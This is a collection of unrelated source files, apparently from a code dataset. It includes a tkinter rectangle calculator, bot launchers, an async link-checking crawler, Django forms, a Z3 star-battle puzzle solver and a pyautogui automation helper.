ax1.legend(['H.264 HRC10 BR=200kb/s, N=1, P=1, L=2','H.264 HRC9 BR=2000kb/s, N=2, P=1-3, L=1-3','H.264 HRC7 BR=800kb/s, N=3, P=1-2-3, L=2-2-3'],loc='lower left')
# plt.show()
plt.savefig(dir+foldername+'_h264_Freezing.pdf')
except:
pass
|
983,768 | 86514a537ae3112aea057b7e6f3cc883924de049 | import tkinter
import math
##### 'CALCULATE' BUTTON #####
def calc_button_clicked():
# Value for the radio button selection
choice = selection.get()
# Regardless of radio selection, convert the input to perimeter side 1 for all calculations
# Use a string version of perimeter for text displays. Use a float version for calculations
# If Sides radio button selected:
if choice == 1:
peri_float_1 = abs(float(side_input_1.get().replace(',', '')))
peri_float_2 = abs(float(side_input_2.get().replace(',', '')))
# If Perimeter radio button is selected:
elif choice == 2:
peri_float_1 = abs(float(perimeter_input.get().replace(',', ''))) / 4
peri_float_2 = peri_float_1
# If Area radio button selected:
elif choice == 3:
peri_float_1 = math.sqrt(abs(float(area_input.get().replace(',', ''))))
peri_float_2 = peri_float_1
# String calculations for all parameters. Use perimeter to calculate all values. Set decimal precision
# to whatever user specifies in input
precision = decimal_input.get()
side_input_1.delete(0, 'end')
side_input_1.insert(0, f'{peri_float_1:,.{precision}f}')
side_input_2.delete(0, 'end')
side_input_2.insert(0, f'{peri_float_2:,.{precision}f}')
perimeter_input.delete(0, 'end')
perimeter_input.insert(0, f'{2 * (peri_float_1 + peri_float_2):,.{precision}f}')
area_input.delete(0, 'end')
area_input.insert(0, f'{peri_float_1 * peri_float_2:,.{precision}f}')
# Clear the canvas. This will allow for any previous shapes to be removed.
# Then redraw the axes and origin coordinates
canvas.delete('all')
draw_axes()
# Set the perimeter strings to match the float equivalents with decimal precision
peri_str_1 = f'{peri_float_1:,.{precision}f}'
peri_str_2 = f'{peri_float_2:,.{precision}f}'
##### SCALING #####
# Only perform scaling if both sides are not 0
if peri_float_1 != 0 and peri_float_2 != 0:
# If both sides are equal
if peri_float_1 == peri_float_2:
# If side 1 is < 200 or > 600, scale accordingly
if peri_float_1 < 200:
draw_coords(peri_float_1 / 2)
peri_float_1 = 200
peri_float_2 = 200
elif peri_float_1 > 600:
draw_coords(peri_float_1 / 2)
peri_float_1 = 600
peri_float_2 = 600
else:
draw_coords()
# If both sides are not equal
else:
# Create boolean so that the correct side is scaled. This is because, in some cases, a side will be
# less than 200 but the other side will be more than 600, meaning both scales would be applicable.
# In this case, only one (the latter vertical side) will scale.
scale_horizontal = False
scale_vertical = False
# If side 1 is < side 2
if peri_float_1 < peri_float_2:
# If side 1 is < 200, enable horizontal scaling
if peri_float_1 < 200:
original_x = peri_float_1
original_y = peri_float_2
ratio = peri_float_2 / peri_float_1
peri_float_1 = 200
peri_float_2 = 200 * ratio
scale_horizontal = True
# If side 2 is > 600, enable vertical scaling.
# Disable horizontal scaling, if any
if peri_float_2 > 600:
# Only scale the original_y value if horizontal scaling has not
# been activated
if not scale_horizontal:
original_y = peri_float_2
ratio = peri_float_2 / 600
peri_float_2 = 600
peri_float_1 /= ratio
scale_horizontal = False
scale_vertical = True
# Else, if side 2 is > side 1
elif peri_float_2 < peri_float_1:
# If side 2 is > 600, enable vertical scaling
if peri_float_2 < 200:
original_x = peri_float_1
original_y = peri_float_2
ratio = peri_float_1 / peri_float_2
peri_float_2 = 200
peri_float_1 = 200 * ratio
scale_vertical = True
# If side 1 is < 200, enable horizontal scaling
# Disable vertical scaling, if any
if peri_float_1 > 600:
# Only scale the original_x value if vertical scaling has not
# been activated
if not scale_vertical:
original_x = peri_float_1
ratio = peri_float_1 / 600
peri_float_1 = 600
peri_float_2 /= ratio
scale_horizontal = True
scale_vertical = False
# If either scaling is enabled (and only one can be enabled), draw rectangle and scale
# accordingly. Else, draw rectangle with default scale (meaning both sides are: 200 <= x <= 600)
if scale_horizontal:
draw_coords(original_x / 2)
elif scale_vertical:
draw_coords(original_y / 2)
else:
draw_coords()
# Draw the rectangle using perimeters. Perimeters must not be 0.
# Send rectangle to lowest layer of canvas so axes are visible over it
if peri_float_1 != 0 and peri_float_2 != 0:
rect = canvas.create_rectangle(canvas_width / 2 - peri_float_1 / 2, canvas_height / 2 - peri_float_2 / 2, \
canvas_width / 2 + peri_float_1 / 2, canvas_height / 2 + peri_float_2 / 2, \
fill = 'lime green', outline = 'black')
canvas.tag_lower(rect)
# Draw the text for the x/y coordinates of perimeter tuples (starting bottom-right, running counter-clockwise)
# Remove the commas in order for numbers to be accepted as floats, then re-add commas in strings for readability
# Set precision based on user's precision input
canvas.create_text(canvas_width / 2 + peri_float_1 / 2 + 5, canvas_height / 2 + peri_float_2 / 2 + 10, anchor = tkinter.NW, \
text = '(' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', -' \
+ ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision))+ ')', fill = 'gray')
canvas.create_text(canvas_width / 2 + peri_float_1 / 2 + 5, canvas_height / 2 - peri_float_2 / 2 - 10, anchor = tkinter.SW, \
text = '(' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', ' \
+ ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
canvas.create_text(canvas_width / 2 - peri_float_1 / 2 - 5, canvas_height / 2 - peri_float_2 / 2 - 10, anchor = tkinter.SE, \
text = '(-' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', ' \
+ ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
canvas.create_text(canvas_width / 2 - peri_float_1 / 2 - 5, canvas_height / 2 + peri_float_2 / 2 + 10, anchor = tkinter.NE, \
text = '(-' + ('{:,.{p}f}'.format(float(peri_str_1.replace(',', '')) / 2, p = precision)) + ', -' \
+ ('{:,.{p}f}'.format(float(peri_str_2.replace(',', '')) / 2, p = precision)) + ')', fill = 'gray')
canvas.pack()
##### 'CLEAR' BUTTON #####
def clear_button_clicked():
# Clear all values. Re-draw axes and coordinates
canvas.delete('all')
selection.set(1)
side_input_1.delete(0, 'end')
side_input_1.insert(0, '0')
side_input_2.delete(0, 'end')
side_input_2.insert(0, '0')
perimeter_input.delete(0, 'end')
perimeter_input.insert(0, '0')
area_input.delete(0, 'end')
area_input.insert(0, '0')
decimal_input.delete(0, 'end')
decimal_input.insert(0, '2')
draw_axes()
draw_coords(100)
##### DRAW AXES, ORIGIN COORDINATES, GRIDLINE MARKERS #####
def draw_axes():
# Draw axes and origin coordinates
canvas.create_line(0, canvas_height / 2, canvas_width, canvas_height / 2, width = 1, fill='black')
canvas.create_line(canvas_width / 2, 0, canvas_width / 2, canvas_height, width = 1, fill='black')
canvas.create_text(canvas_width / 2 + 5, canvas_height / 2 + 10, anchor = tkinter.W, text = '(0, 0)')
# Draw gridline markers
x_gridlines = canvas_width / 8
y_gridlines = canvas_height / 8
for num in range(7):
canvas.create_line(x_gridlines, canvas_height / 2 - 10, \
x_gridlines, canvas_height / 2 + 10, fill = 'black')
canvas.create_line(canvas_width / 2 - 10, y_gridlines, \
canvas_width / 2 + 10, y_gridlines, fill = 'black')
x_gridlines += canvas_width / 8
y_gridlines += canvas_height / 8
##### DRAW GRID COORDINATES #####
def draw_coords(length = 100):
# If (side / 2) is <= 100, rightmost coordinate will be 3 * (side / 2). Otherwise, coordinate will be
# the current set side / 2. This will allow coordinates to adapt to side size
if length <= 100:
grid_val = length * 3
else:
grid_val = length
# x/y coordinates will be set to increments that 1/8 the size of the canvas
grid_x_position = canvas_width - canvas_width / 8
grid_y_position = 0 + canvas_height / 8
# Set precision to current decimal input
precision = decimal_input.get()
# Run loop 7 times (skipping the middle coordinate), drawing the coordinates on screen. Then increment
# the grid values accordingly
for num in range(7):
if num != 3:
canvas.create_text(grid_x_position, canvas_height / 2 + 20, text = f'{grid_val:,.{precision}f}')
canvas.create_text(canvas_width / 2 + 30, grid_y_position, text = f'{grid_val:,.{precision}f}')
grid_x_position -= canvas_width / 8
grid_y_position += canvas_height / 8
if length <= 100:
grid_val -= length
else:
grid_val -= length / 3
##### MAIN FUNCTION #####
# Create main window. Set to full screen. Place window on top
window = tkinter.Toplevel()
window.geometry('%dx%d' % (window.winfo_screenwidth(), window.winfo_screenheight()))
# Set canvas width/height constants
canvas_width = 800
canvas_height = 800
# Create top frame & canvas, and bottom frame & button canvas
top_frame = tkinter.Frame(window, width = canvas_width, height = 1000)
top_frame.pack(side = 'top', pady = 10)
canvas = tkinter.Canvas(top_frame, width = canvas_width, height = canvas_height, bg = 'white', \
highlightbackground = 'black', highlightthickness = 1)
canvas.pack()
bottom_frame = tkinter.Frame(window, width = canvas_width, height = 100)
bottom_frame.pack(side = 'top', pady = 10)
bottom_frame.pack_propagate(0)
button_canvas = tkinter.Canvas(bottom_frame, width = canvas_width, height = 100, bg = 'lavender', \
highlightbackground = 'black', highlightthickness = 1)
button_canvas.pack()
# Draw default axes and default coordinates
draw_axes()
##### RADIO BUTTONS #####
selection = tkinter.IntVar()
selection.set(1)
selection_sides = tkinter.Radiobutton(bottom_frame, text = 'Sides', variable = selection, value = 1, bg = 'lavender')
selection_perimeter = tkinter.Radiobutton(bottom_frame, text = 'Perimeter', variable = selection, value = 2, bg = 'lavender')
selection_area = tkinter.Radiobutton(bottom_frame, text = 'Area', variable = selection, value = 3, bg = 'lavender')
selection_sides.place(x = 200, y = 15)
selection_perimeter.place(x = 200, y = 45)
selection_area.place(x = 200, y = 65)
##### USER INPUT AND BUTTONS #####
side_input_1 = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
side_input_2 = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
perimeter_input = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
area_input = tkinter.Entry(bottom_frame, width = 17, justify = 'right')
# Insert a 0 in the user_input box. This will prevent error if user clicks 'Calculate' with a null value
side_input_1.insert(0, '0')
side_input_2.insert(0, '0')
perimeter_input.insert(0, '0')
area_input.insert(0, '0')
side_label_1 = tkinter.Label(bottom_frame, text = 'x: ', bg = 'lavender')
side_label_2 = tkinter.Label(bottom_frame, text = 'y: ', bg = 'lavender')
side_label_1.place(x = canvas_width / 2 - 70, y = 10)
side_label_2.place(x = canvas_width / 2 - 70, y = 30)
side_input_1.place(x = canvas_width / 2 - 50, y = 10)
side_input_2.place(x = canvas_width / 2 - 50, y = 30)
perimeter_input.place(x = canvas_width / 2 - 50, y = 50)
area_input.place(x = canvas_width / 2 - 50, y = 70)
# 'Calculate' button
calc_button = tkinter.Button(bottom_frame, text = 'Calculate', command = calc_button_clicked, height = 3, width = 8)
calc_button.place(x = canvas_width / 2 + 75, y = 20)
# 'Clear all' button
clear_button = tkinter.Button(bottom_frame, text = 'Clear all', command = clear_button_clicked, height = 3, width = 8)
clear_button.place(x = canvas_width / 2 + 150, y = 20)
# 'Back' button
back_button = tkinter.Button(bottom_frame, text = 'Back', command = lambda : window.destroy(), height = 3, width = 8)
back_button.place(x = 10, y = 20)
# Decimal precision input
decimal_label = tkinter.Label(bottom_frame, text = 'Dec. precision: ', bg = 'lavender')
decimal_label.place(x = canvas_width - 150, y = 10)
decimal_input = tkinter.Entry(bottom_frame, width = 5, justify = 'right')
decimal_input.insert(0, '2')
decimal_input.place(x = canvas_width - 50, y = 10)
# Draw default axes and default coordinates
draw_axes()
draw_coords(100)
# Run tkinter main loop
tkinter.mainloop()
|
983,769 | 2ca61fde1abb6d11ee759486d2a2d59ec6c00a12 | #!/usr/bin/python3
# vim: ts=4 expandtab
from __future__ import annotations
from storage import FileStore
from bot import DiscordBot, TwitchBot
def main():
with FileStore("list.txt") as storage:
discord_bot(storage)
print("All bots shutdown")
def twich_bot(storage: FileStore) -> None:
with open("twitch.token", "r") as token_handle:
[token, client_id] = token_handle.read().strip().split(":", 1)
instance = TwitchBot(token, int(client_id), "eorzeas_only_hope", storage)
instance.join("sugarsh0t")
instance.run()
def discord_bot(storage: FileStore) -> None:
with open("discord.token", "r") as token_handle:
token = token_handle.read().strip()
if not token:
raise Exception("Unable to load token from token file")
instance = DiscordBot(storage)
instance.run(token)
if __name__ == "__main__":
main()
|
983,770 | c2e8ccc1bc9908968fa1c69f050b3577c18f7a35 | import asyncio
import re
from typing import Iterator
from urllib.parse import ParseResult, urlparse
import aiohttp
from bs4 import BeautifulSoup
from yarl import URL
from reporter import Reporter
class Crawler:
"""
A web crawler that checks the HTTP status of all links on a website and
its sub-pages.
The crawler uses the Breadth First Search algorithm to crawl a given
website and all its subsidiaries. Websites that are out of scope (don't
have the same network location as the give website) are ignored.
Inspiration: https://github.com/aosabook/500lines/blob/master/crawler
/code/crawling.py
"""
MAX_WORKERS = 10
def __init__(self, root: str):
# asyncio stuff
self.loop = asyncio.get_event_loop()
self.session = aiohttp.ClientSession(loop=self.loop)
self.workers = []
self.visited = set([root])
self.q = asyncio.Queue(loop=self.loop)
self.q.put_nowait((root, root))
self.netloc = urlparse(root).netloc.replace('www.', '')
self.scanned = 0
def start(self):
"""Starts the crawling. Cleans up after crawler is interrupted."""
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(self._setup())
except KeyboardInterrupt:
Reporter.info('Crawler stopping...')
finally:
loop.run_until_complete(self._close())
# Next 2 lines are needed for aiohttp resource cleanup
loop.stop()
loop.run_forever()
loop.close()
async def _setup(self):
"""Starts the async workers. Runs until the task queue is empty."""
Reporter.info('Setting up workers...')
self.workers = [asyncio.Task(self._work(), loop=self.loop)
for _ in range(self.MAX_WORKERS)]
Reporter.info('Starting scan...')
await self.q.join()
async def _work(self):
"""Pulls URLs from the task queue and scans them."""
try:
while True:
url, parent = await self.q.get()
await self._scan(url, parent)
self.q.task_done()
self.scanned += 1
Reporter.status(self.scanned, self.q.qsize())
except asyncio.CancelledError:
Reporter.info('Worker stopped!')
async def _scan(self, url: str, parent: str):
"""
Fetches a URL HTML text and adds all links in the text to the
task queue. If URL is not available, reports it.
"""
Reporter.scan(parent, url)
try:
res = await self.session.get(url)
except aiohttp.ClientError as e:
Reporter.error(parent, url, e)
return
if res.status >= 400:
Reporter.broken(parent, url, res.status)
return
for link in await self._find_links(res):
if link not in self.visited:
self.visited.add(link)
self.q.put_nowait((link, url))
async def _find_links(self, res: aiohttp.ClientResponse) -> Iterator[str]:
"""Finds all 'a' tags on the page. Parses and returns them."""
content = await res.text()
soup = BeautifulSoup(content, 'html.parser')
links = [self._format(res.url, a) for a in soup.find_all('a')]
return filter(lambda l: l is not None, links)
def _format(self, parent: URL, tag: {}):
"""
Retrieves, formats, and returns URLs from an 'a' tag.
Returns None, if no URL was found or if URL does is not valid.
"""
url = tag.get('href', None)
if url is None:
return None
parsed = urlparse(url)
if parsed.netloc == '':
parsed = parsed._replace(scheme=parent.scheme)
parsed = parsed._replace(netloc=parent.host)
return parsed.geturl() if self._is_valid(parsed) else None
def _is_valid(self, url: ParseResult):
"""Checks if a URL complies with a given set of validators."""
if (
re.match('(.*).' + self.netloc, url.netloc) is None or
re.match('(.*)\+[0-9]*$', url.path) is not None or
re.match('(.*)javascript:(.*)', url.path) is not None
):
return False
return True
async def _close(self):
"""Cancels all workers. Closes aiohttp session."""
for w in self.workers:
w.cancel()
await self.session.close()
|
983,771 | 9ef103019bd2cb0d409e206a8ae6c5692138d3a3 | from django import forms
class form_UserProfile(forms.Form):
gender = forms.CharField(label='gender')
age_range = forms.CharField(label='age_range')
marriage = forms.CharField(label='marriage')
education = forms.CharField(label='education')
live_with = forms.CharField(label='live_with')
live_with_detail = forms.CharField(label='live_with_detail')
guardian = forms.CharField(label='guardian')
occupation = forms.CharField(label='occupation')
income_avg = forms.CharField(label='income_avg')
chronic_dis = forms.CharField(label='chronic_dis')
chronic_dis_detail = forms.CharField(label='chronic_dis_detail')
chronic_dis_time = forms.CharField(label='chronic_dis_time')
medi_number = forms.CharField(label='medi_number')
medi_detail = forms.CharField(label='medi_detail')
hyperventi_medi = forms.CharField(label='hyperventi_medi')
hyperventi_detail = forms.CharField(label='hyperventi_detail')
fall_his = forms.CharField(label='fall_his')
class form_AnswerSheetAB(forms.Form):
user_id = forms.IntegerField(label='id')
qa1 = forms.IntegerField(label='qa1')
qa2 = forms.IntegerField(label='qa2')
qa3 = forms.IntegerField(label='qa3')
qa4 = forms.IntegerField(label='qa4')
qa5 = forms.IntegerField(label='qa5')
qa6 = forms.IntegerField(label='qa6')
qb1 = forms.IntegerField(label='qb1')
qb2 = forms.IntegerField(label='qb2')
qb3 = forms.IntegerField(label='qb3')
qb4 = forms.IntegerField(label='qb4')
qb5 = forms.IntegerField(label='qb5')
qb6 = forms.IntegerField(label='qb6')
class form_AnswerSheetC(forms.Form):
user_id = forms.IntegerField(label='id')
qc1 = forms.IntegerField(label='qc1')
qc2 = forms.IntegerField(label='qc2')
qc3 = forms.IntegerField(label='qc3')
qc4 = forms.IntegerField(label='qc4')
qc5 = forms.IntegerField(label='qc5')
qc6 = forms.IntegerField(label='qc6')
class form_intermediate(forms.Form):
user_id = forms.IntegerField(label='id')
class form_AnswerSheetD(forms.Form):
user_id = forms.IntegerField(label='id')
qd1 = forms.IntegerField(label='qd1')
qd2 = forms.IntegerField(label='qd2')
qd3 = forms.IntegerField(label='qd3')
qd4 = forms.IntegerField(label='qd4')
qd5 = forms.IntegerField(label='qd5')
class form_AnswerSheetE(forms.Form):
user_id = forms.IntegerField(label='id')
qe1 = forms.IntegerField(label='qe1')
qe2 = forms.IntegerField(label='qe2')
qe3 = forms.IntegerField(label='qe3')
qe4 = forms.IntegerField(label='qe4')
qe5 = forms.IntegerField(label='qe5')
class form_risk(forms.Form):
user_id = forms.IntegerField(label='id')
eye_sight = forms.CharField(label = 'eye_sight')
balancing = forms.CharField(label='balancing')
medication = forms.CharField(label='medication')
falling_in_6_months = forms.CharField(label ='falling')
home = forms.CharField(label='home')
|
983,772 | 5b5f48747863869418144b0716c60f6fe27a0428 | import logging
import json
import pathlib
import os
from jsonschema import Draft7Validator, validators, RefResolver
from jsonschema.exceptions import ValidationError
LOGGER = logging.getLogger(__name__)
RESOLVER = None
def extend_with_defaults(validator_class):
"""Extends the validator class to set defaults automatically."""
validate_properties = validator_class.VALIDATORS["properties"]
def set_defaults(validator, properties, instance, schema):
for property, subschema in properties.items():
if "default" in subschema:
instance.setdefault(property, subschema["default"])
for error in validate_properties(
validator,
properties,
instance,
schema,
):
yield error
return validators.extend(
validator_class,
{"properties": set_defaults},
)
Validator = extend_with_defaults(Draft7Validator)
def resolver():
"""Load the schema and returns a resolver."""
if RESOLVER:
return RESOLVER
path = str(pathlib.Path(__file__).parents[1].joinpath("schema", "app.json"))
with open(path) as stream:
schema = json.load(stream)
globals()["RESOLVER"] = RefResolver(
"https://schema.timeflux.io/app.json", None
).from_schema(schema)
return RESOLVER
def validate(instance, definition="app"):
"""Validate a Timeflux application or a graph.
Args:
instance (dict): The application to validate.
definition (string): The subschema to validate against.
"""
schema = {"$ref": "#/definitions/" + definition}
validator = Validator(schema, resolver=resolver())
errors = sorted(validator.iter_errors(instance), key=lambda e: e.path)
if errors:
for error in errors:
path = "/".join(str(e) for e in error.path)
LOGGER.error("%s (%s)" % (error.message, path))
raise ValueError("Validation failed")
|
983,773 | 4301788ffceace90124439c1a0b3f86ec7159a4f |
from drift_detector.stream_volatility.buffer import Buffer
from drift_detector.stream_volatility.reservoir import Reservoir
class VolatilityDetector:
"""
A drift detector is a detector that monitors the changes of stream volatility.
Stream Volatility is the rate of changes of the detected changes given by a drift detector like Adwin.
We can see this kind of detector as a drift detector the a set of given drifts and we call it volatility detector.
A volatility detector takes the output of a drift detector and outputs an alarm if there is a change in the rate
of detected drifts.
The implementation uses two components: a buffer and a reservoir.
The buffer is a sliding window that keeps the most recent samples of drift intervals acquired from
a drift detection technique. The reservoir is a pool that stores previous samples which ideally represent
the overall state of the stream.
References
----------
Huang, D.T.J., Koh, Y.S., Dobbie, G., Pears, R.: Detecting volatility shift in data streams.
In: 2014 IEEE International Conference on Data Mining (ICDM), pp. 863–868 (2014)
"""
def __init__(self, drift_detector, size):
"""
Initialize a drift detector
Parameters
----------
drift_detector: type drift_detector
The volatility detector takes the output of a drift detector.
The corresponding drift detector is passed here to monitor its outputs.
size: int
Size of the reservoir and buffer by default.
"""
self.drift_detector = drift_detector
self.sample = 0
self.reservoir = Reservoir(size)
self.buffer = Buffer(size)
self.confidence = 0.05
self.recent_interval = []
self.timestamp = 0
self.vol_drift_found = False
self.drift_found = False
self.pre_drift_point = -1
self.rolling_index = 0
for i in range(size * 2 + 1):
self.recent_interval.append(0.0)
def set_input(self, input_value):
"""
Main part of the algorithm, takes the drifts detected by a drift detector.
Parameters
----------
input_value: real value
The input value of the volatility detector, the value should be real values and should be the output
of some drift detector.
Returns
-------
vol_drift_found: true if a drift of stream volatility was found.
"""
self.sample += 1
self.drift_found = self.drift_detector.set_input(input_value)
if self.drift_found:
self.timestamp += 1
if self.buffer.is_full:
result_buffer = self.buffer.add(self.timestamp)
self.reservoir.add_element(result_buffer)
else:
self.buffer.add(self.timestamp)
interval = self.timestamp
self.recent_interval[self.rolling_index] = interval
self.rolling_index += 1
if self.rolling_index == self.reservoir.size * 2:
self.rolling_index = 0
self.timestamp = 0
self.pre_drift_point = self.sample
if self.buffer.is_full and self.reservoir.check_full():
relative_var = self.buffer.get_stddev() / self.reservoir.get_stddev()
if relative_var > (1.0 + self.confidence) or relative_var < (1.0 - self.confidence):
self.buffer.clear()
# self.severity_buffer[:] = []
self.vol_drift_found = True
else:
self.vol_drift_found = False
else:
self.timestamp += 1
self.vol_drift_found = False
return self.vol_drift_found
|
983,774 | c77e7892c2ed41269a200696b504c0831fcd4276 | from .common_cfg import *
import random
enable_task = True
data_url = 'http://clima.info.unlp.edu.ar/last?lang=es'
mqtt_sensor_id = 'linti_control'
mqtt_client_id = mqtt_sensor_id + '_{:04x}'.format(random.getrandbits(16))
seconds_between_checks = 60
|
983,775 | 2adefff0dfce240cdd3a2a258fec2b669b222b1b | import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras import optimizers
# collect the training data
x_train = np.array([[1, 5], [2, 7], [9, 14], [6, 10], [8, 21], [16, 19],
[5, 1], [7, 2], [14, 9], [10, 6], [21, 8],[19, 16]])
y_train = np.array([[1], [1], [1], [1], [1], [1],
[0], [0], [0], [0], [0], [0]])
print(x_train)
print(y_train)
# design the model
model = Sequential()
model.add(Dense(1, input_dim=2, activation=None, use_bias=False))
model.add(Activation('sigmoid'))
# compile the model and pick the optimizer and loss function
ada = optimizers.Adagrad(lr=0.1, epsilon=1e-8)
model.compile(optimizer=ada, loss='binary_crossentropy', metrics=['accuracy'])
# training the model
print('training')
model.fit(x_train, y_train, batch_size=4, epochs=100, shuffle=True)
model.fit(x_train, y_train, batch_size=12, epochs=100, shuffle=True)
# test the model
test_ans = model.predict(np.array([[2, 20], [20, 2]]), batch_size=2)
print('model_weight')
print(model.layers[0].get_weights())
print('ans')
print(test_ans) |
983,776 | b9052813dca187d59428b54d6a808fae25b8064d | # Size of a single page in a paginated query.
_PAGE_SIZE = 100
class PaginatedCollection:
""" An iterable collection of database objects (Projects, Labels, etc...).
Implements automatic (transparent to the user) paginated fetching during
iteration. Intended for use by library internals and not by the end user.
For a list of attributes see __init__(...) documentation. The params of
__init__ map exactly to object attributes.
"""
def __init__(self, client, query, params, dereferencing, obj_class):
""" Creates a PaginatedCollection.
Params:
client (labelbox.Client): the client used for fetching data from DB.
query (str): Base query used for pagination. It must contain two
'%d' placeholders, the first for pagination 'skip' clause and
the second for the 'first' clause.
params (dict): Query parameters.
dereferencing (iterable): An iterable of str defining the keypath
that needs to be dereferenced in the query result in order to
reach the paginated objects of interest.
obj_class (type): The class of object to be instantiated with each
dict containing db values.
"""
self.client = client
self.query = query
self.params = params
self.dereferencing = dereferencing
self.obj_class = obj_class
self._fetched_pages = 0
self._fetched_all = False
self._data = []
def __iter__(self):
self._data_ind = 0
return self
def __next__(self):
if len(self._data) <= self._data_ind:
if self._fetched_all:
raise StopIteration()
query = self.query % (self._fetched_pages * _PAGE_SIZE, _PAGE_SIZE)
self._fetched_pages += 1
results = self.client.execute(query, self.params)
for deref in self.dereferencing:
results = results[deref]
page_data = [
self.obj_class(self.client, result) for result in results
]
self._data.extend(page_data)
if len(page_data) < _PAGE_SIZE:
self._fetched_all = True
if len(page_data) == 0:
raise StopIteration()
rval = self._data[self._data_ind]
self._data_ind += 1
return rval
|
983,777 | 58268bdfb94d3bdc892f6e3d95d514d5f1bce554 | street= "서울시 종로구"
type = "아파트"
number_of_rooms
price = 1000000
print("################################")
print("# #")
print("# 부동산 매물 광고 #")
print("# #")
print("##################################")
print("")
print(street,"에 위치한 아주 좋은", type , "가 매물로 나왔습니다.이",type,"는 "
number_of_rooms,"개의 바을 가지고 있으며 가격은",price,"입니다.")
|
983,778 | 50fd5ea8578e6584968a61a04be3d22a61deba04 | from lib import BaseTest
class CreateRepo1Test(BaseTest):
"""
create local repo: regular repo
"""
runCmd = "aptly repo create repo1"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo1", "repo_show")
class CreateRepo2Test(BaseTest):
"""
create local repo: regular repo with comment
"""
runCmd = "aptly repo create -comment=Repository2 repo2"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo2", "repo_show")
class CreateRepo3Test(BaseTest):
"""
create local repo: duplicate name
"""
fixtureCmds = ["aptly repo create repo3"]
runCmd = "aptly repo create -comment=Repository3 repo3"
expectedCode = 1
|
983,779 | 05efdb7a8b3151cfaab4dea9ddd309e5493572b8 | '''Star battle puzzle solver using Z3
Inspired by minesweeper solver in Sec 3.9 of https://sat-smt.codes/SAT_SMT_by_example.pdf
and https://github.com/ppmx/sudoku-solver
'''
from utils import *
from pprint import pprint
import time
from z3 import Solver, Int, Or, Sum, sat
def add_constraint(expr, solver, debug=False,msg=""):
if debug:
print(msg)
print(expr)
solver.add(expr)
return 1
def solve(puzzle, debug=False):
b = puzzle["regions"]
n = puzzle["size"]
st = puzzle["stars"]
s = Solver()
# a variable for every cell, plus a border buffer
# TODO: remove the (left and top) buffer, it's no longer needed
cells=[[ Int(f'r%d_c%d' % (i,j)) for j in range(0,n+1) ] for i in range(0,n+1) ]
nc = 0 # number of constraints counter
for row in range(1, n+1):
for col in range(1, n+1):
expr = Or(cells[row][col] == 0, cells[row][col] == 1)
nc += add_constraint(Or(cells[row][col] == 0, cells[row][col] == 1),
solver=s, debug=debug, msg=f"* Handling cell {row, col}, value must be 0 or 1")
if row < n:
nc += add_constraint(Or(cells[row][col] == 0, cells[row+1][col] == 0),
solver=s, debug=debug, msg=" o No adjacent stars, to below")
if col < n:
nc += add_constraint(Or(cells[row][col] == 0, cells[row][col+1] == 0),
solver=s, debug=debug, msg=" o No adjacent stars, to the right")
if row < n and col < n:
nc += add_constraint(Or(cells[row][col] == 0, cells[row+1][col+1] == 0),
solver=s, debug=debug, msg=" o No adjacent stars, to the right-below")
this_row = [cells[row][col] for col in range(1,n+1)]
nc += add_constraint(Sum(*this_row) == st,
solver=s, debug=debug, msg=f"* {st} stars in row {row}")
for col in range(1, n+1):
this_col = [cells[row][col] for row in range(1,n+1)]
nc += add_constraint(Sum(*this_col) == st,
solver=s, debug=debug, msg=f"* {st} stars in column {col}")
for reg in range(0, max(max(b)) + 1):
this_region = [cells[row][col] for row in range(1,n+1) for col in range(1,n+1) if b[row-1][col-1] == reg]
nc += add_constraint(Sum(*this_region) == st,
solver=s, debug=debug, msg=f"* {st} stars in region {reg}")
# SOLVING
print(f"Asking Z3 to solve {nc} integer constraints in {n * n} variables..")
if s.check() != sat:
raise Exception("Z3 says the puzzle is unsolvable.")
model = s.model()
sol = []
for row in range(1, n+1):
this_row = [0] * n
for col in range(1,n+1):
this_row[col - 1] = int(model.evaluate(cells[row][col]).as_string())
sol += [this_row]
return sol
def main(puzzle):
n = puzzle["size"]
s = puzzle["stars"]
print(f"Solving the following {s}-star {n} * {n} puzzle:")
#pprint(puzzle["regions"])
print(puzzle_to_string(puzzle))
print("---------------------")
start = time.time()
sol = solve(puzzle, debug=False)
end = time.time()
print("---------------------")
print(f"Solution found by Z3 after {end - start} secs:")
print(puzzle_to_string(puzzle,sol))
#pprint(sol)
print("--------------------")
print("Performing manual Python check of solution:")
res, msg = manual_check(puzzle, sol)
if res:
print("Check passed")
else:
print("Check failed")
print(msg)
from sample_puzzles import sample_puzzles
main(sample_puzzles[3])
|
983,780 | f11233f1242ab37b5716d9aa4d1b75a9a0237ac9 | import pyautogui
import time
import pyperclip
import random
import unidecode
from datetime import datetime
import sys
import lorem
stime = float(sys.argv[1])
ltime = float(sys.argv[2])
def Enter():
time.sleep(stime*0.2)
pyautogui.press("enter")
time.sleep(stime*0.2)
def tab():
time.sleep(stime*0.2)
pyautogui.press("tab")
time.sleep(stime*0.2)
def iclick(string):
time.sleep(stime/2)
pyautogui.click(string)
time.sleep(stime/2)
def iwrite(pic,string):
iclick(pic)
pyperclip.copy(string)
pyautogui.hotkey("ctrl", "v")
def click(x,y):
pyautogui.moveTo(x,y,duration=0.5)
pyautogui.click(x,y)
def TEnter():
tab()
Enter()
def twrite(string):
tab()
pyperclip.copy(string)
pyautogui.hotkey("ctrl", "v")
def write(x,y,string):
click(x,y)
pyperclip.copy(string)
pyautogui.hotkey("ctrl", "v")
def tscroll(options):
tab()
Enter()
for _ in range (random.randrange(1,options)):
pyautogui.press('down')
time.sleep(stime*0.1)
Enter()
time.sleep(stime)
def iscroll(pic,options):
iclick(pic)
for _ in range (random.randrange(1,options)):
pyautogui.press('down')
pyautogui.press('enter')
time.sleep(stime)
def scroll_list(x,y,options):
click(x,y)
